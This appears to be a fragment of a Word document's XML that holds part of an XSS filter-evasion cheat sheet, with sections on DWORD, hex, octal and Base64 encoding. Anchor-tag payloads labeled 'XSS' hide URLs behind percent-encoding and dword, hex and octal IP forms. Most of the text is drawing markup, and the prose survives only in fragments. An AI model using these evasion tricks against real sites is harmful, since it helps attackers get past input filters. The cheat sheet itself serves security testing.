                              <a:gd name="T37" fmla="*/ T36 w 5723"/>
                              <a:gd name="T38" fmla="+- 0 413 251"/>
                              <a:gd name="T39" fmla="*/ 413 h 183"/>
                              <a:gd name="T40" fmla="+- 0 7319 1614"/>
                              <a:gd name="T41" fmla="*/ T40 w 5723"/>
                              <a:gd name="T42" fmla="+- 0 433 251"/>
                              <a:gd name="T43" fmla="*/ 433 h 183"/>
                              <a:gd name="T44" fmla="+- 0 7316 1614"/>
                              <a:gd name="T45" fmla="*/ T44 w 5723"/>
                              <a:gd name="T46" fmla="+- 0 434 251"/>
                              <a:gd name="T47" fmla="*/ 43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23" h="183">
                                <a:moveTo>
                                  <a:pt x="5702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5702" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="5723" y="22"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="5723" y="162"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="5705" y="182"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="5702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1"/>
                            <a:ext cx="572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4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HREF="http://%77%77%77%2E%67%6F%6F%67%6C%65%2E%63%6F%6D"&gt;XSS&lt;/A&gt;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1" o:spid="_x0000_s1875" style="position:absolute;margin-left:80.7pt;margin-top:12.55pt;width:286.15pt;height:9.15pt;z-index:-15577600;mso-wrap-distance-left:0;mso-wrap-distance-right:0;mso-position-horizontal-relative:page;mso-position-vertical-relative:text" coordorigin="1614,251" coordsize="5723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">
                <v:shape id="Freeform 553" o:spid="_x0000_s1876" style="position:absolute;left:1614;top:251;width:5723;height:183;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="5723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2dGsIA&#10;AADcAAAADwAAAGRycy9kb3ducmV2LnhtbESPQWvCQBSE7wX/w/IKvTWbWCISXaUIotdGofT2yL5m&#10;Y7Nvw+6q8d+7BcHjMDPfMMv1aHtxIR86xwqKLAdB3DjdcavgeNi+z0GEiKyxd0wKbhRgvZq8LLHS&#10;7spfdKljKxKEQ4UKTIxDJWVoDFkMmRuIk/frvMWYpG+l9nhNcNvLaZ7PpMWO04LBgTaGmr/6bBVM&#10;i3pnT6YMuT9hr93P7PvDoFJvr+PnAkSkMT7Dj/ZeKyjLAv7PpCMgV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TZ0awgAAANwAAAAPAAAAAAAAAAAAAAAAAJgCAABkcnMvZG93&#10;bnJldi54bWxQSwUGAAAAAAQABAD1AAAAhwMAAAAA&#10;" path="m5702,183l21,183r-3,-1l,162r,-4l,22,21,,5702,r21,22l5723,162r-18,20l5702,183xe" fillcolor="#f5f5f5" stroked="f">
                  <v:path arrowok="t" o:connecttype="custom" o:connectlocs="5702,434;21,434;18,433;0,413;0,409;0,273;21,251;5702,251;5723,273;5723,413;5705,433;5702,434" o:connectangles="0,0,0,0,0,0,0,0,0,0,0,0"/>
                </v:shape>
                <v:shape id="Text Box 552" o:spid="_x0000_s1877" type="#_x0000_t202" style="position:absolute;left:1614;top:251;width:5723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zpB8UA&#10;AADcAAAADwAAAGRycy9kb3ducmV2LnhtbESPQWvCQBSE70L/w/IKvZlNBcW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fOkH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14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HREF="http://%77%77%77%2E%67%6F%6F%67%6C%65%2E%63%6F%6D"&gt;XSS&lt;/A&gt;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b/>
          <w:sz w:val="8"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00AC7743" w:rsidRDefault="00EF5896">
      <w:pPr>
        <w:pStyle w:val="Balk4"/>
      </w:pPr>
      <w:r>
        <w:t>DWORD</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="4"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>Encoding</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AC7743" w:rsidRDefault="00AC7743">
      <w:pPr>
        <w:pStyle w:val="GvdeMetni"/>
        <w:spacing w:before="5"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="19"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00AC7743" w:rsidRDefault="00EF5896">
      <w:pPr>
        <w:pStyle w:val="GvdeMetni"/>
        <w:spacing w:before="1"/>
        <w:ind w:left="154"/>
      </w:pPr>
      <w:r>
        <w:t>Note:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="7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variations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Dword</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="8"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>encoding</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="8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see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IP</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="7"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>Obfuscation</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="8"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>calculator</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="8"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>below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details:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AC7743" w:rsidRDefault="00EF5896">
      <w:pPr>
        <w:pStyle w:val="GvdeMetni"/>
        <w:spacing w:before="8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3939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160020</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1975485" cy="116205"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapTopAndBottom/>
                <wp:docPr id="547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5485" cy="116205"/>
                          <a:chOff x="1614" y="252"/>
                          <a:chExt cx="3111" cy="183"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="548" name="Freeform 550"/>
                        <wps:cNvSpPr>
                          <a:spLocks/>
                        </wps:cNvSpPr>
                        <wps:spPr bwMode="auto">
                          <a:xfrm>
                            <a:off x="1614" y="251"/>
                            <a:ext cx="3111" cy="183"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst>
                              <a:gd name="T0" fmla="+- 0 4704 1614"/>
                              <a:gd name="T1" fmla="*/ T0 w 3111"/>
                              <a:gd name="T2" fmla="+- 0 434 252"/>
                              <a:gd name="T3" fmla="*/ 434 h 183"/>
                              <a:gd name="T4" fmla="+- 0 1635 1614"/>
                              <a:gd name="T5" fmla="*/ T4 w 3111"/>
                              <a:gd name="T6" fmla="+- 0 434 252"/>
                              <a:gd name="T7" fmla="*/ 434 h 183"/>
                              <a:gd name="T8" fmla="+- 0 1632 1614"/>
                              <a:gd name="T9" fmla="*/ T8 w 3111"/>
                              <a:gd name="T10" fmla="+- 0 433 252"/>
                              <a:gd name="T11" fmla="*/ 433 h 183"/>
                              <a:gd name="T12" fmla="+- 0 1614 1614"/>
                              <a:gd name="T13" fmla="*/ T12 w 3111"/>
                              <a:gd name="T14" fmla="+- 0 413 252"/>
                              <a:gd name="T15" fmla="*/ 413 h 183"/>
                              <a:gd name="T16" fmla="+- 0 1614 1614"/>
                              <a:gd name="T17" fmla="*/ T16 w 3111"/>
                              <a:gd name="T18" fmla="+- 0 410 252"/>
                              <a:gd name="T19" fmla="*/ 410 h 183"/>
                              <a:gd name="T20" fmla="+- 0 1614 1614"/>
                              <a:gd name="T21" fmla="*/ T20 w 3111"/>
                              <a:gd name="T22" fmla="+- 0 273 252"/>
                              <a:gd name="T23" fmla="*/ 273 h 183"/>
                              <a:gd name="T24" fmla="+- 0 1635 1614"/>
                              <a:gd name="T25" fmla="*/ T24 w 3111"/>
                              <a:gd name="T26" fmla="+- 0 252 252"/>
                              <a:gd name="T27" fmla="*/ 252 h 183"/>
                              <a:gd name="T28" fmla="+- 0 4704 1614"/>
                              <a:gd name="T29" fmla="*/ T28 w 3111"/>
                              <a:gd name="T30" fmla="+- 0 252 252"/>
                              <a:gd name="T31" fmla="*/ 252 h 183"/>
                              <a:gd name="T32" fmla="+- 0 4725 1614"/>
                              <a:gd name="T33" fmla="*/ T32 w 3111"/>
                              <a:gd name="T34" fmla="+- 0 273 252"/>
                              <a:gd name="T35" fmla="*/ 273 h 183"/>
                              <a:gd name="T36" fmla="+- 0 4725 1614"/>
                              <a:gd name="T37" fmla="*/ T36 w 3111"/>
                              <a:gd name="T38" fmla="+- 0 413 252"/>
                              <a:gd name="T39" fmla="*/ 413 h 183"/>
                              <a:gd name="T40" fmla="+- 0 4707 1614"/>
                              <a:gd name="T41" fmla="*/ T40 w 3111"/>
                              <a:gd name="T42" fmla="+- 0 433 252"/>
                              <a:gd name="T43" fmla="*/ 433 h 183"/>
                              <a:gd name="T44" fmla="+- 0 4704 1614"/>
                              <a:gd name="T45" fmla="*/ T44 w 3111"/>
                              <a:gd name="T46" fmla="+- 0 434 252"/>
                              <a:gd name="T47" fmla="*/ 43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111" h="183">
                                <a:moveTo>
                                  <a:pt x="30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090" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="3111" y="21"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="3111" y="161"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="3093" y="181"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="30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Text Box 549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1"/>
                            <a:ext cx="311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0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</w:t>
                              </w:r>
                              <w:hyperlink r:id="rId58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http://1113982867/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"&gt;XSS&lt;/A&gt;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8" o:spid="_x0000_s1878" style="position:absolute;margin-left:80.7pt;margin-top:12.6pt;width:155.55pt;height:9.15pt;z-index:-15577088;mso-wrap-distance-left:0;mso-wrap-distance-right:0;mso-position-horizontal-relative:page;mso-position-vertical-relative:text" coordorigin="1614,252" coordsize="311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">
                <v:shape id="Freeform 550" o:spid="_x0000_s1879" style="position:absolute;left:1614;top:251;width:3111;height:183;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="311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hdBMIA&#10;AADcAAAADwAAAGRycy9kb3ducmV2LnhtbERPz2vCMBS+D/wfwhO8zbTDDVeNIivCmOyg22W3R/Ns&#10;SpuX2kTT/ffmMNjx4/u93o62EzcafONYQT7PQBBXTjdcK/j+2j8uQfiArLFzTAp+ycN2M3lYY6Fd&#10;5CPdTqEWKYR9gQpMCH0hpa8MWfRz1xMn7uwGiyHBoZZ6wJjCbSefsuxFWmw4NRjs6c1Q1Z6uVsF1&#10;/3Moy09TUd7H9tKWMf94jUrNpuNuBSLQGP7Ff+53reB5kdamM+k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SF0EwgAAANwAAAAPAAAAAAAAAAAAAAAAAJgCAABkcnMvZG93&#10;bnJldi54bWxQSwUGAAAAAAQABAD1AAAAhwMAAAAA&#10;" path="m3090,182l21,182r-3,-1l,161r,-3l,21,21,,3090,r21,21l3111,161r-18,20l3090,182xe" fillcolor="#f5f5f5" stroked="f">
                  <v:path arrowok="t" o:connecttype="custom" o:connectlocs="3090,434;21,434;18,433;0,413;0,410;0,273;21,252;3090,252;3111,273;3111,413;3093,433;3090,434" o:connectangles="0,0,0,0,0,0,0,0,0,0,0,0"/>
                </v:shape>
                <v:shape id="Text Box 549" o:spid="_x0000_s1880" type="#_x0000_t202" style="position:absolute;left:1614;top:251;width:311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Htq8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kYf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e2r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70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</w:t>
                        </w:r>
                        <w:hyperlink r:id="rId59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http://1113982867/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"&gt;XSS&lt;/A&gt;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Balk4"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
          <w:w w:val="105"/>
        </w:rPr>
        <w:t>Hex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Encoding</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AC7743" w:rsidRDefault="00AC7743">
      <w:pPr>
        <w:pStyle w:val="GvdeMetni"/>
        <w:spacing w:before="5"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="19"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00AC7743" w:rsidRDefault="00EF5896">
      <w:pPr>
        <w:pStyle w:val="GvdeMetni"/>
        <w:spacing w:before="1" w:line="333" w:lineRule="auto"/>
        <w:ind w:left="154"/>
      </w:pPr>
      <w:r>
        <w:t>The</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="7"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>total</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="8"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>size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allowed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somewhere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neighborhood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240</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="7"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>total</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="8"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>characters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see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second</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="5"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>digit,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since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hex</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="6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between</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="5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leading</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="6"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>zero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third</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="6"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>hex</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="5"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>quotet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required):</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AC7743" w:rsidRDefault="00EF5896">
      <w:pPr>
        <w:pStyle w:val="GvdeMetni"/>
        <w:spacing w:before="6"/>
        <w:rPr>
          <w:sz w:val="11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3990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112395</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="2669540" cy="116205"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapTopAndBottom/>
                <wp:docPr id="544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9540" cy="116205"/>
                          <a:chOff x="1614" y="177"/>
                          <a:chExt cx="4204" cy="183"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="545" name="Freeform 547"/>
                        <wps:cNvSpPr>
                          <a:spLocks/>
                        </wps:cNvSpPr>
                        <wps:spPr bwMode="auto">
                          <a:xfrm>
                            <a:off x="1614" y="177"/>
                            <a:ext cx="4204" cy="183"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst>
                              <a:gd name="T0" fmla="+- 0 5797 1614"/>
                              <a:gd name="T1" fmla="*/ T0 w 4204"/>
                              <a:gd name="T2" fmla="+- 0 359 177"/>
                              <a:gd name="T3" fmla="*/ 359 h 183"/>
                              <a:gd name="T4" fmla="+- 0 1635 1614"/>
                              <a:gd name="T5" fmla="*/ T4 w 4204"/>
                              <a:gd name="T6" fmla="+- 0 359 177"/>
                              <a:gd name="T7" fmla="*/ 359 h 183"/>
                              <a:gd name="T8" fmla="+- 0 1632 1614"/>
                              <a:gd name="T9" fmla="*/ T8 w 4204"/>
                              <a:gd name="T10" fmla="+- 0 359 177"/>
                              <a:gd name="T11" fmla="*/ 359 h 183"/>
                              <a:gd name="T12" fmla="+- 0 1614 1614"/>
                              <a:gd name="T13" fmla="*/ T12 w 4204"/>
                              <a:gd name="T14" fmla="+- 0 338 177"/>
                              <a:gd name="T15" fmla="*/ 338 h 183"/>
                              <a:gd name="T16" fmla="+- 0 1614 1614"/>
                              <a:gd name="T17" fmla="*/ T16 w 4204"/>
                              <a:gd name="T18" fmla="+- 0 335 177"/>
                              <a:gd name="T19" fmla="*/ 335 h 183"/>
                              <a:gd name="T20" fmla="+- 0 1614 1614"/>
                              <a:gd name="T21" fmla="*/ T20 w 4204"/>
                              <a:gd name="T22" fmla="+- 0 198 177"/>
                              <a:gd name="T23" fmla="*/ 198 h 183"/>
                              <a:gd name="T24" fmla="+- 0 1635 1614"/>
                              <a:gd name="T25" fmla="*/ T24 w 4204"/>
                              <a:gd name="T26" fmla="+- 0 177 177"/>
                              <a:gd name="T27" fmla="*/ 177 h 183"/>
                              <a:gd name="T28" fmla="+- 0 5797 1614"/>
                              <a:gd name="T29" fmla="*/ T28 w 4204"/>
                              <a:gd name="T30" fmla="+- 0 177 177"/>
                              <a:gd name="T31" fmla="*/ 177 h 183"/>
                              <a:gd name="T32" fmla="+- 0 5818 1614"/>
                              <a:gd name="T33" fmla="*/ T32 w 4204"/>
                              <a:gd name="T34" fmla="+- 0 198 177"/>
                              <a:gd name="T35" fmla="*/ 198 h 183"/>
                              <a:gd name="T36" fmla="+- 0 5818 1614"/>
                              <a:gd name="T37" fmla="*/ T36 w 4204"/>
                              <a:gd name="T38" fmla="+- 0 338 177"/>
                              <a:gd name="T39" fmla="*/ 338 h 183"/>
                              <a:gd name="T40" fmla="+- 0 5800 1614"/>
                              <a:gd name="T41" fmla="*/ T40 w 4204"/>
                              <a:gd name="T42" fmla="+- 0 359 177"/>
                              <a:gd name="T43" fmla="*/ 359 h 183"/>
                              <a:gd name="T44" fmla="+- 0 5797 1614"/>
                              <a:gd name="T45" fmla="*/ T44 w 4204"/>
                              <a:gd name="T46" fmla="+- 0 359 177"/>
                              <a:gd name="T47" fmla="*/ 35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204" h="183">
                                <a:moveTo>
                                  <a:pt x="418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183" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="4204" y="21"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="4204" y="161"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="4186" y="182"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="418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77"/>
                            <a:ext cx="420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</w:t>
                              </w:r>
                              <w:hyperlink r:id="rId60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http://0x42.0x0000066.0x7.0x93/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"&gt;XSS&lt;/A&gt;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5" o:spid="_x0000_s1881" style="position:absolute;margin-left:80.7pt;margin-top:8.85pt;width:210.2pt;height:9.15pt;z-index:-15576576;mso-wrap-distance-left:0;mso-wrap-distance-right:0;mso-position-horizontal-relative:page;mso-position-vertical-relative:text" coordorigin="1614,177" coordsize="420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">
                <v:shape id="Freeform 547" o:spid="_x0000_s1882" style="position:absolute;left:1614;top:177;width:4204;height:183;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="420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aTdsYA&#10;AADcAAAADwAAAGRycy9kb3ducmV2LnhtbESPQWvCQBSE7wX/w/KE3nRjaaRGVxFLoUEQaovg7Zl9&#10;TUKzb8PuNon/visIPQ4z8w2z2gymER05X1tWMJsmIIgLq2suFXx9vk1eQPiArLGxTAqu5GGzHj2s&#10;MNO25w/qjqEUEcI+QwVVCG0mpS8qMuintiWO3rd1BkOUrpTaYR/hppFPSTKXBmuOCxW2tKuo+Dn+&#10;GgWL82F+2JX9af96urr80uU5F6lSj+NhuwQRaAj/4Xv7XStIn1O4nYlH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8aTdsYAAADcAAAADwAAAAAAAAAAAAAAAACYAgAAZHJz&#10;L2Rvd25yZXYueG1sUEsFBgAAAAAEAAQA9QAAAIsDAAAAAA==&#10;" path="m4183,182l21,182r-3,l,161r,-3l,21,21,,4183,r21,21l4204,161r-18,21l4183,182xe" fillcolor="#f5f5f5" stroked="f">
                  <v:path arrowok="t" o:connecttype="custom" o:connectlocs="4183,359;21,359;18,359;0,338;0,335;0,198;21,177;4183,177;4204,198;4204,338;4186,359;4183,359" o:connectangles="0,0,0,0,0,0,0,0,0,0,0,0"/>
                </v:shape>
                <v:shape id="Text Box 546" o:spid="_x0000_s1883" type="#_x0000_t202" style="position:absolute;left:1614;top:177;width:420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52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AZp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nnZ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</w:t>
                        </w:r>
                        <w:hyperlink r:id="rId61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http://0x42.0x0000066.0x7.0x93/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"&gt;XSS&lt;/A&gt;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Balk4"/>
      </w:pPr>
      <w:r>
        <w:t>Octal</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="3"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>Encoding</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AC7743" w:rsidRDefault="00AC7743">
      <w:pPr>
        <w:pStyle w:val="GvdeMetni"/>
        <w:spacing w:before="5"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="19"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00AC7743" w:rsidRDefault="00EF5896">
      <w:pPr>
        <w:pStyle w:val="GvdeMetni"/>
        <w:spacing w:before="1"/>
        <w:ind w:left="154"/>
      </w:pPr>
      <w:r>
        <w:t>Again</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="5"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>padding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allowed,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="5"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>although</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="6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keep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above</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="5"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>4</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="6"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>total</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="5"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>characters</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="5"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>per</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="6"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>class</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="5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class</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="5"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>A,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="6"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>class</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="5"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>B,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="6"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>etc...:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AC7743" w:rsidRDefault="00EF5896">
      <w:pPr>
        <w:pStyle w:val="GvdeMetni"/>
        <w:spacing w:before="8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4041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160020</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="2669540" cy="116205"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapTopAndBottom/>
                <wp:docPr id="541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9540" cy="116205"/>
                          <a:chOff x="1614" y="252"/>
                          <a:chExt cx="4204" cy="183"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="542" name="Freeform 544"/>
                        <wps:cNvSpPr>
                          <a:spLocks/>
                        </wps:cNvSpPr>
                        <wps:spPr bwMode="auto">
                          <a:xfrm>
                            <a:off x="1614" y="251"/>
                            <a:ext cx="4204" cy="183"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst>
                              <a:gd name="T0" fmla="+- 0 5797 1614"/>
                              <a:gd name="T1" fmla="*/ T0 w 4204"/>
                              <a:gd name="T2" fmla="+- 0 434 252"/>
                              <a:gd name="T3" fmla="*/ 434 h 183"/>
                              <a:gd name="T4" fmla="+- 0 1635 1614"/>
                              <a:gd name="T5" fmla="*/ T4 w 4204"/>
                              <a:gd name="T6" fmla="+- 0 434 252"/>
                              <a:gd name="T7" fmla="*/ 434 h 183"/>
                              <a:gd name="T8" fmla="+- 0 1632 1614"/>
                              <a:gd name="T9" fmla="*/ T8 w 4204"/>
                              <a:gd name="T10" fmla="+- 0 433 252"/>
                              <a:gd name="T11" fmla="*/ 433 h 183"/>
                              <a:gd name="T12" fmla="+- 0 1614 1614"/>
                              <a:gd name="T13" fmla="*/ T12 w 4204"/>
                              <a:gd name="T14" fmla="+- 0 413 252"/>
                              <a:gd name="T15" fmla="*/ 413 h 183"/>
                              <a:gd name="T16" fmla="+- 0 1614 1614"/>
                              <a:gd name="T17" fmla="*/ T16 w 4204"/>
                              <a:gd name="T18" fmla="+- 0 410 252"/>
                              <a:gd name="T19" fmla="*/ 410 h 183"/>
                              <a:gd name="T20" fmla="+- 0 1614 1614"/>
                              <a:gd name="T21" fmla="*/ T20 w 4204"/>
                              <a:gd name="T22" fmla="+- 0 273 252"/>
                              <a:gd name="T23" fmla="*/ 273 h 183"/>
                              <a:gd name="T24" fmla="+- 0 1635 1614"/>
                              <a:gd name="T25" fmla="*/ T24 w 4204"/>
                              <a:gd name="T26" fmla="+- 0 252 252"/>
                              <a:gd name="T27" fmla="*/ 252 h 183"/>
                              <a:gd name="T28" fmla="+- 0 5797 1614"/>
                              <a:gd name="T29" fmla="*/ T28 w 4204"/>
                              <a:gd name="T30" fmla="+- 0 252 252"/>
                              <a:gd name="T31" fmla="*/ 252 h 183"/>
                              <a:gd name="T32" fmla="+- 0 5818 1614"/>
                              <a:gd name="T33" fmla="*/ T32 w 4204"/>
                              <a:gd name="T34" fmla="+- 0 273 252"/>
                              <a:gd name="T35" fmla="*/ 273 h 183"/>
                              <a:gd name="T36" fmla="+- 0 5818 1614"/>
                              <a:gd name="T37" fmla="*/ T36 w 4204"/>
                              <a:gd name="T38" fmla="+- 0 413 252"/>
                              <a:gd name="T39" fmla="*/ 413 h 183"/>
                              <a:gd name="T40" fmla="+- 0 5800 1614"/>
                              <a:gd name="T41" fmla="*/ T40 w 4204"/>
                              <a:gd name="T42" fmla="+- 0 433 252"/>
                              <a:gd name="T43" fmla="*/ 433 h 183"/>
                              <a:gd name="T44" fmla="+- 0 5797 1614"/>
                              <a:gd name="T45" fmla="*/ T44 w 4204"/>
                              <a:gd name="T46" fmla="+- 0 434 252"/>
                              <a:gd name="T47" fmla="*/ 43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204" h="183">
                                <a:moveTo>
                                  <a:pt x="418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183" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="4204" y="21"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="4204" y="161"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="4186" y="181"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="418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1"/>
                            <a:ext cx="420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</w:t>
                              </w:r>
                              <w:hyperlink r:id="rId62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http://0102.0146.0007.00000223/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"&gt;XSS&lt;/A&gt;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2" o:spid="_x0000_s1884" style="position:absolute;margin-left:80.7pt;margin-top:12.6pt;width:210.2pt;height:9.15pt;z-index:-15576064;mso-wrap-distance-left:0;mso-wrap-distance-right:0;mso-position-horizontal-relative:page;mso-position-vertical-relative:text" coordorigin="1614,252" coordsize="420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">
                <v:shape id="Freeform 544" o:spid="_x0000_s1885" style="position:absolute;left:1614;top:251;width:4204;height:183;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="420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8LAsYA&#10;AADcAAAADwAAAGRycy9kb3ducmV2LnhtbESPQWvCQBSE7wX/w/KE3nRTqWJTVxGl0CAIxiL09pp9&#10;TUKzb8PuNon/visIPQ4z8w2z2gymER05X1tW8DRNQBAXVtdcKvg4v02WIHxA1thYJgVX8rBZjx5W&#10;mGrb84m6PJQiQtinqKAKoU2l9EVFBv3UtsTR+7bOYIjSlVI77CPcNHKWJAtpsOa4UGFLu4qKn/zX&#10;KHj5PC6Ou7K/HPaXq8u+uizjYq7U43jYvoIINIT/8L39rhXMn2dwOxOP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8LAsYAAADcAAAADwAAAAAAAAAAAAAAAACYAgAAZHJz&#10;L2Rvd25yZXYueG1sUEsFBgAAAAAEAAQA9QAAAIsDAAAAAA==&#10;" path="m4183,182l21,182r-3,-1l,161r,-3l,21,21,,4183,r21,21l4204,161r-18,20l4183,182xe" fillcolor="#f5f5f5" stroked="f">
                  <v:path arrowok="t" o:connecttype="custom" o:connectlocs="4183,434;21,434;18,433;0,413;0,410;0,273;21,252;4183,252;4204,273;4204,413;4186,433;4183,434" o:connectangles="0,0,0,0,0,0,0,0,0,0,0,0"/>
                </v:shape>
                <v:shape id="Text Box 543" o:spid="_x0000_s1886" type="#_x0000_t202" style="position:absolute;left:1614;top:251;width:420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naQc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WD48Q7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6dpB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</w:t>
                        </w:r>
                        <w:hyperlink r:id="rId63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http://0102.0146.0007.00000223/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"&gt;XSS&lt;/A&gt;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Balk4"/>
      </w:pPr>
      <w:r>
        <w:t>Base64</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="6"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
